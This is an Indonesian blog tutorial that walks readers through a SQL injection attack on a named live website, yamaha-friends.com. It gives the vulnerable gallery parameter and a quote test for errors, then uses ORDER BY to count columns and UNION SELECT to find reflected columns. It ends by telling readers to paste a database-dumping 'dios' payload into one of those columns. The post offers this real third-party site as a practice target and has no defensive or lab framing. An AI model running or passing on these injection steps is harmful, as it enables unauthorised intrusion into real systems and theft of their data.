Lompat ke konten Lompat ke sidebar Lompat ke footer

Tutorial Sql Injection (Print nick+img+database)



Assalamualikum sloerr

Balik lagi dengan mimin yang sangat gans ><

Okk, disini aku menemukan bug yang rentan sql di website yamaha

Langsung aja kyta ke tutorial


bahan"

-dios klik aku bep

-live target yang aku pake Klik aku bep

-Jangan lupa kopi + udud na

Follow juga ige mimin Sini say

Langsung saja step by stepnya


Okk kita liat" aja dlu webnya sambil nyari parameter

Okk disini kita klik aja, gallery
Sekarang kelen klik, foto yang mana aja
Ok, disini aku menemukan paramernya
http://yamaha-friends.com/gallery-detail.php?id=9
http://yamaha-friends.com/gallery-detail.php?id=9'
Kasih tanda (') buat ngecek vuln sqlnya
Okk disini ada tulisan Warning: mysql_fetch_assoc() expects

Berarti vuln sql injection
Langsung aee kita order by

http://yamaha-friends.com/gallery-detail.php?id=9%27+order+by+1--+-
Lahh? Kok masih gini bang?
Okk disini gua jelasin kenapa masih (Warning: mysql_fetch_assoc() expects)
http://yamaha-friends.com/gallery-detail.php?id=9%27+order+by+1--+-

Okk kalo begitu kelen apus aja (%27)nya

Contoh => http://yamaha-friends.com/gallery-detail.php?id=9+order+by+1--+-
Okk disini kembali seperti semula
Langsung aja kita ganti nomor ordernya 
Pokoknya sampe web na eror


http://yamaha-friends.com/gallery-detail.php?id=9%27+order+by+1--+- =>OK

http://yamaha-friends.com/gallery-detail.php?id=9%27+order+by+4--+- =>OK

http://yamaha-friends.com/gallery-detail.php?id=9%27+order+by+6--+- =>Ok

http://yamaha-friends.com/gallery-detail.php?id=9%27+order+by+8--+- =>ERROR

Disini errornya di angka 8, jadi kelen
Union select aja ampe nomor 7
Buat nyari angka ajaib nya

Contoh => http://yamaha-friends.com/gallery-detail.php?id=9+union+select+1,2,3,4,5,6,7--+-


Okk dan boom, muncul nomor ajaib na 
Di angka 3 dan 5
Langsung aja kalian tempelkan dios kelen di angka 3

Boom ke inject
Okk, sekian dari aku
Semoga bermanfaat
See you next time ><

Great:
All My friends and you!!
Special Thx to:





Posting Komentar untuk "Tutorial Sql Injection (Print nick+img+database)"